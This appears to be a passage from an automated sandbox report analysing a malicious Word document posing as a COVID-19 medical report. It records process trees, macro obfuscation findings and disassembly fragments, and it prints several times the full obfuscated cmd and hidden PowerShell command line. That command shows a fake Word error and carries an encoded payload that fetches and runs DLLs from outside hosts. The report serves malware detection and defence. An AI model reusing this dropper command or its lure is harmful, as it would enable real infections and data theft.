IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: <ystem.pdb@) source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098556907.00000000027F0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp

Source: IU-8549 Medical report COVID-19.doc

Initial sample: OLE summary subject = Rubber Berkshire Credit Card Account generate engage Cambridgeshire Uganda Shilling Auto Loan Account object-oriented online Lead

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: IU-8549 Medical report COVID-19.doc	Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Dulz0g2a3qqdjsty7			Name: Dulz0g2a3qqdjsty7

Document contains an embedded VBA with many randomly named variables

Show sources

Source: IU-8549 Medical report COVID-19.doc

Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High entropy of concatenated variable names

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: IU-8549 Medical report COVID-19.doc	Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module Dulz0g2a3qqdjsty7			Name: Dulz0g2a3qqdjsty7

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC			Jump to behavior

Source: E6_R.dll.5.dr

Static PE information: real checksum: 0x5c618 should be: 0x5db58

Source: E6_R.dll.5.dr	Static PE information: section name: .text4
Source: E6_R.dll.5.dr	Static PE information: section name: .text8
Source: E6_R.dll.5.dr	Static PE information: section name: .text7
Source: E6_R.dll.5.dr	Static PE information: section name: .text6
Source: E6_R.dll.5.dr	Static PE information: section name: .text5

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022FED0 push edx; ret	7_2_0022FFD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00211155 push ecx; ret	7_2_00211156
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002121EC pushad ; ret	7_2_00212200
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00213391 push eax; iretd	7_2_002133AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00210C18 pushfd ; retf	7_2_00210C19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002117A1 push ds; iretd	7_2_002117A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0028FED0 push edx; ret	8_2_0028FFD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00271155 push ecx; ret	8_2_00271156
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002721EC pushad ; ret	8_2_00272200
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00273391 push eax; iretd	8_2_002733AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00270C18 pushfd ; retf	8_2_00270C19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002717A1 push ds; iretd	8_2_002717A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0014FED0 push edx; ret	9_2_0014FFD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00131155 push ecx; ret	9_2_00131156
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001321EC pushad ; ret	9_2_00132200
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00133391 push eax; iretd	9_2_001333AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00130C18 pushfd ; retf	9_2_00130C19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001317A1 push ds; iretd	9_2_001317A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0019FED0 push edx; ret	10_2_0019FFD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00181155 push ecx; ret	10_2_00181156
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001821EC pushad ; ret	10_2_00182200
